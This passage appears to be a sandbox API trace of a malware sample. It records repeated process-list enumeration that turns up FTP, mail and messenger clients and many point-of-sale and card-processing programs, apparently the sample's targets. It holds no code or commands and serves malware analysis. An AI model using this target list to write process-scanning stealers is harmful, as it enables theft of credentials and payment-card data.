returned 1 [0194.217] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0194.221] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0194.223] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0194.225] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0194.227] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0194.229] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0194.231] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0194.240] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0194.242] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0194.244] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0194.246] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0194.249] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0194.251] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0194.253] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0194.255] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0194.257] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0194.259] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0194.261] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0194.263] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0194.265] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0194.268] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0194.270] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0194.272] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0194.277] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0194.279] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0194.281] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0194.282] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0194.284] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0194.288] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0194.290] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0194.292] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0194.294] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0194.295] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0194.297] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0194.299] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0194.301] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0194.304] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0194.306] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0194.309] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0194.313] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0194.319] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0194.321] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0194.323] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0194.325] Process32Next (in: hSnapshot=0x3a0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0194.327] CloseHandle (hObject=0x3a0) returned 1 [0194.327] Sleep (dwMilliseconds=0x64) [0195.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f0 [0195.135] Process32First (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.137] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.139] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.141] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.143] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.145] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.146] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.148] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.149] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.151] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.153] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.154] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.156] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.157] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.311] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.318] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.320] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.322] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.324] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.326] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0195.328] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0195.330] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0195.332] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0195.339] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.341] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0195.345] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0195.480] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0195.483] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0195.485] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0195.488] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0195.490] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.493] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.495] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0195.497] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0195.500] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.502] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0195.504] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0195.507] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0195.561] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0195.563] Process32Next (in: hSnapshot=0x18f0, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, 